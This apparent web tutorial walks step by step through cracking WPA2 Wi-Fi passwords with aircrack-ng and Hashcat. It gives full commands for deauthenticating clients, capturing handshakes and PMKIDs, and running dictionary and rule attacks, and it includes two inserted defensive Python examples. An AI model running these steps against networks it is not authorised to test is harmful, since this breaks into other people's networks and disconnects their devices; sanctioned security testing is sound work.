Last updated: March 2026
Aircrack-ng WPA2 Handshake Capture and Crack Tutorial (2026)
To crack a WPA2 password with Aircrack-ng: put your adapter in monitor mode with airmon-ng, capture packets with airodump-ng, force a handshake using aireplay-ng -0, then crack the saved .cap file with aircrack-ng -w rockyou.txt capture.cap. For GPU-accelerated cracking, convert to .hc22000 format and use Hashcat mode 22000.
Legal notice: Only perform wireless security testing on networks you own or have explicit written permission to test. Unauthorized access to WiFi networks is illegal under the CFAA, Computer Misuse Act, and equivalent laws worldwide.
What You Need
- Kali Linux (or Debian with aircrack-ng installed)
- A USB WiFi adapter that supports monitor mode and packet injection
- The target network's SSID and BSSID (your own network for testing)
- A wordlist file (e.g., /usr/share/wordlists/rockyou.txt)
For adapter recommendations, see the Best USB WiFi Adapters for Kali Linux 2026. The Alfa AWUS036NHA (AR9271 chipset) and the Alfa AWUS036ACH (RTL8812AU chipset, kernel 6.14+) are both well-tested options.
Step 1: Verify Aircrack-ng is Installed
aircrack-ng --version
Expected output:
Aircrack-ng 1.7 r0
Copyright (C) 2006-2022 Thomas d'Otreppe de Bouvette, Mandriva S.A.
...
On Kali Linux, aircrack-ng is pre-installed. For Debian or other distros, see How to Install Aircrack-ng on Debian and Kali.
Step 2: Identify Your WiFi Interface
iw dev
Or:
iwconfig
Note the interface name — typically wlan0 or wlan1 for a USB adapter. Internal adapters often appear as wlan0; a second USB adapter would be wlan1.
# Also check with ip link
ip link show
Step 3: Enable Monitor Mode
Kill Interfering Processes
NetworkManager and wpa_supplicant interfere with monitor mode. Kill them first:
sudo airmon-ng check kill
Expected output:
Killing these processes:
PID Name
1234 wpa_supplicant
5678 NetworkManager
Start Monitor Mode
sudo airmon-ng start wlan0
Expected output:
PHY Interface Driver Chipset
phy0 wlan0 ath9k_htc Atheros Communications AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Your interface is now renamed to wlan0mon. Verify:
iw dev
# Should show: type monitor
Alternative: Enable Monitor Mode Manually
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
iw dev wlan0 info
Step 4: Scan for WiFi Networks
sudo airodump-ng wlan0mon
This displays all detected access points in real time:
CH 9 ][ Elapsed: 12 s ][ 2026-03-26 10:05
BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:FF -42 23 4 0 6 130 WPA2 CCMP PSK MyHomeNetwork
11:22:33:44:55:66 -67 12 0 0 11 130 WPA2 CCMP PSK Neighbor_WiFi
99:88:77:66:55:44 -71 8 2 0 1 54 WPA2 CCMP PSK AnotherNetwork
BSSID STATION PWR Rate Lost Frames Notes Probes
AA:BB:CC:DD:EE:FF CC:DD:EE:FF:00:11 -55 1 - 1 0 12
Note the following for your target network:
- BSSID: The access point MAC address (e.g., AA:BB:CC:DD:EE:FF)
- CH: The WiFi channel (e.g., 6)
- ESSID: The network name
Press Ctrl+C to stop the scan once you have identified your target.
Step 5: Capture the WPA2 Handshake
Lock airodump-ng onto your target network and save the capture:
sudo airodump-ng \
-c 6 \
--bssid AA:BB:CC:DD:EE:FF \
-w capture \
wlan0mon
Flags:
- -c 6 — Lock to channel 6 (the channel your target is on)
- --bssid AA:BB:CC:DD:EE:FF — Filter to only the target AP
- -w capture — Write capture files (creates capture-01.cap, capture-01.csv, etc.)
airodump-ng now waits for a device to connect to the AP. When a handshake is captured, you will see:
CH 6 ][ Elapsed: 1 min ][ 2026-03-26 10:06 ][ WPA handshake: AA:BB:CC:DD:EE:FF
Leave this terminal running and proceed to Step 6 to force a handshake.
Step 6: Force a Handshake with Deauthentication
A WPA2 handshake is only exchanged when a client connects to the AP. Rather than waiting for a client to naturally reconnect, you can send deauthentication frames to force a reconnect.
Open a second terminal and run:
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon
Flags:
- -0 5 — Send 5 deauthentication packets (deauth attack)
- -a AA:BB:CC:DD:EE:FF — Target the access point
To target a specific connected client (gentler, less disruptive to others):
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
Where -c CC:DD:EE:FF:00:11 is the client's MAC address from the airodump-ng STATION column.
Expected output:
10:06:45 Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:FF) on channel 6
10:06:45 Sending 64 directed DeAuth (code 7). STMAC: [CC:DD:EE:FF:00:11] [34|63 ACKs]
10:06:46 Sending 64 directed DeAuth (code 7). STMAC: [CC:DD:EE:FF:00:11] [34|63 ACKs]
After the deauth, the client will automatically reconnect, and airodump-ng will capture the WPA2 handshake.
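From the defender's side, the deauthentication burst described above is easy to spot in a monitor-mode capture. The following is an added example written for this edit, not code from the tutorial or the aircrack-ng project: it parses raw 802.11 management frames, counts deauthentication frames per sender/receiver pair in a sliding window, and raises one alert when the count reaches a threshold. It assumes frames arrive as (timestamp, bytes) pairs with any radiotap header already stripped; the sample frames are constructed inline and never transmitted.

```python
import struct
from collections import defaultdict, deque

# 802.11 frame control, byte 0: bits 2-3 are the frame type, bits 4-7 the subtype.
MGMT_TYPE = 0
DEAUTH_SUBTYPE = 12

def parse_deauth(frame: bytes):
    """Return (sender, receiver, reason_code) for a deauthentication frame, else None.
    Expects a raw 802.11 frame (radiotap header already stripped; an assumption)."""
    if len(frame) < 26:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    if ftype != MGMT_TYPE or subtype != DEAUTH_SUBTYPE:
        return None
    # Management header: FC(2) duration(2) addr1(6) addr2(6) addr3(6) seq(2); body at 24.
    receiver = frame[4:10].hex(":")   # addr1: the station being kicked off
    sender = frame[10:16].hex(":")    # addr2: the (claimed) AP address
    reason = struct.unpack("<H", frame[24:26])[0]
    return sender, receiver, reason

def detect_deauth_bursts(frames, window=2.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_80211_bytes).
    Alerts once per (sender, receiver) pair whose deauth count within any
    sliding window of `window` seconds reaches `threshold`. A legitimate AP
    rarely sends more than a handful; aireplay-ng -0 sends bursts of 64."""
    recent = defaultdict(deque)
    alerts = set()
    for ts, raw in frames:
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        sender, receiver, reason = parsed
        q = recent[(sender, receiver)]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts.add((sender, receiver, reason))
    return sorted(alerts)

def make_deauth(sender, receiver, reason=7):
    """Constructed sample frame for offline testing only; it is never transmitted."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    fc = bytes([(DEAUTH_SUBTYPE << 4) | (MGMT_TYPE << 2), 0])
    return fc + b"\x00\x00" + mac(receiver) + mac(sender) + mac(sender) + b"\x00\x00" + struct.pack("<H", reason)
```

Feeding it the frames from a capture taken during the Step 6 burst yields a single alert for the AP-to-client pair with reason code 7, matching the "DeAuth (code 7)" lines aireplay-ng prints.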
Step 7: Verify the Handshake was Captured
In the airodump-ng terminal, look for:
WPA handshake: AA:BB:CC:DD:EE:FF
This confirmation appears in the top right of the airodump-ng display. Press Ctrl+C to stop the capture.
Check the capture file:
ls -lh capture-01.cap
# -rw-r--r-- 1 root root 284K Mar 26 10:07 capture-01.cap
Verify the handshake using aircrack-ng without a wordlist:
aircrack-ng capture-01.cap
Output confirms a valid handshake:
Opening capture-01.cap
Read 12345 packets.
# BSSID ESSID Encryption
1 AA:BB:CC:DD:EE:FF MyHomeNetwork WPA (1 handshake)
Step 8: Crack the Handshake with Aircrack-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Expected output (when password found):
Aircrack-ng 1.7
[00:00:03] 45896/14344391 keys tested (14356.45 k/s)
Time left: 16 minutes, 20 seconds 0.32%
KEY FOUND! [ password123 ]
Master Key : A2 3F 4D ...
Transient Key : B9 12 CD ...
EAPOL HMAC : 3A 45 7C ...
If the password is not in rockyou.txt, aircrack-ng will exhaust the list:
Passphrase not in dictionary
In that case, try additional wordlists or rules with Hashcat (see Step 9).
Step 9: GPU-Accelerated Cracking with Hashcat (Mode 22000)
Hashcat is significantly faster than aircrack-ng for WPA2 cracking, especially with a GPU. An RTX 4090 reaches ~2,600 kH/s (about 2.6 million keys/second) on WPA2, versus ~14,000 keys/second for aircrack-ng on a CPU.
Convert .cap to .hc22000 Format
# Install hcxtools
sudo apt install hcxtools
# Convert capture file
hcxpcapngtool -o capture.hc22000 capture-01.cap
Expected output:
[+] 1 EAPOL pair(s) written to capture.hc22000
Crack with Hashcat
# Basic dictionary attack
hashcat -m 22000 -a 0 capture.hc22000 /usr/share/wordlists/rockyou.txt
# With optimized kernels and high workload
hashcat -m 22000 -a 0 -O -w 3 capture.hc22000 /usr/share/wordlists/rockyou.txt
# With rules for better coverage
hashcat -m 22000 -a 0 \
-r /usr/share/hashcat/rules/best64.rule \
capture.hc22000 \
/usr/share/wordlists/rockyou.txt
Hashcat output when password is found:
AA:BB:CC:DD:EE:FF:MyHomeNetwork:password123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
For full Hashcat usage, including hash modes and GPU optimization, see:
- Hashcat Wordlist Attack Tutorial
- Hashcat GPU Benchmark Table 2026
Step 10: Re-enable Managed Mode
When you are done, restore normal WiFi operation:
# Stop monitor mode
sudo airmon-ng stop wlan0mon
# Restart NetworkManager
sudo systemctl start NetworkManager
Troubleshooting
No Handshake Captured
- Ensure a client is associated with the AP before sending deauth
- Move physically closer to the AP
- Try increasing the deauth count: aireplay-ng -0 10 ...
- Confirm you are on the correct channel
- Some modern routers handle deauth more gracefully — try PMKID capture instead (see below)
PMKID Capture (No Client Needed)
Modern WPA2 networks often expose the PMKID in beacon frames, eliminating the need for a connected client:
# Install hcxdumptool
sudo apt install hcxdumptool
# Capture PMKID
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
# Convert to Hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
# Crack with Hashcat
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt
Injection Test Fails
sudo aireplay-ng --test wlan0mon
If injection fails, check your adapter supports injection (see Best USB WiFi Adapters for Kali Linux 2026) and ensure airmon-ng check kill was run.
FAQ
Q: Do I need a special WiFi adapter for this?
A: Yes. Your laptop's built-in WiFi adapter almost certainly does not support monitor mode or packet injection. You need a USB adapter with a compatible chipset. The Alfa AWUS036NHA (AR9271), Alfa AWUS036ACH (RTL8812AU), and TP-Link TL-WN722N v1 (AR9271) are reliable choices. See the adapter guide for full details.
Q: Why is aircrack-ng slow compared to Hashcat?
A: Aircrack-ng uses CPU-based cracking, typically reaching ~14,000 keys/second on a modern processor. Hashcat uses GPU compute (CUDA/OpenCL), achieving ~2,600,000 keys/second on an RTX 4090 — about 185x faster. Always use Hashcat for serious WPA2 cracking.
Q: What if the password is not in rockyou.txt?
A: Try larger wordlists (SecLists, rockyou2021), add Hashcat rules (best64.rule, OneRuleToRuleThemAll), or use mask attacks for known password patterns. See Hashcat Rule-Based Attacks for advanced techniques.
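To make the two FAQ answers above concrete, here is an added example written for this edit (not part of the tutorial or the aircrack-ng project): it derives a WPA2 PMK exactly as the standard defines it (PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt), which is the work every tested candidate costs, and turns the rates quoted on this page into worst-case exhaustion times for the rockyou.txt list and for two passphrase keyspaces. The rates and the rockyou entry count are taken from the page; the self-check uses the published IEEE 802.11 test vector (passphrase "password", SSID "IEEE").

```python
import hashlib

# Candidate-testing rates quoted on this page (keys per second).
RATES_PER_SEC = {"aircrack-ng (CPU)": 14_000, "hashcat (RTX 4090)": 2_600_000}
ROCKYOU_ENTRIES = 14_344_391  # total shown in the aircrack-ng progress line in Step 8

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK Pairwise Master Key: PBKDF2-HMAC-SHA1, 4096 rounds, 256-bit output,
    with the SSID as salt. Every candidate a cracker tests costs this much work,
    and the salt means a PMK computed for one SSID is useless against another."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def keyspace(charset_size: int, length: int) -> int:
    """Number of candidates for a passphrase of exactly `length` characters."""
    return charset_size ** length

def seconds_to_exhaust(candidates: int, rate_per_sec: int) -> float:
    """Worst-case time to try every candidate at a given rate."""
    return candidates / rate_per_sec

def exposure_report(candidates: int) -> dict:
    """Days needed to exhaust `candidates` at each quoted rate."""
    return {name: seconds_to_exhaust(candidates, rate) / 86_400
            for name, rate in RATES_PER_SEC.items()}

if __name__ == "__main__":
    # IEEE 802.11 test vector: passphrase "password", SSID "IEEE".
    print(derive_pmk("password", "IEEE").hex())
    for label, n in [("rockyou.txt", ROCKYOU_ENTRIES),
                     ("8 lowercase letters", keyspace(26, 8)),
                     ("12 mixed-case alphanumerics", keyspace(62, 12))]:
        print(label, {k: f"{v:.3g} days" for k, v in exposure_report(n).items()})
```

The rockyou run comes out at roughly 17 minutes on the CPU rate and a few seconds on the GPU rate, which matches the "Time left" figure in Step 8; an 8-character lowercase passphrase falls in under a day on the GPU, while 12 mixed-case alphanumerics would take millions of years at the same rate.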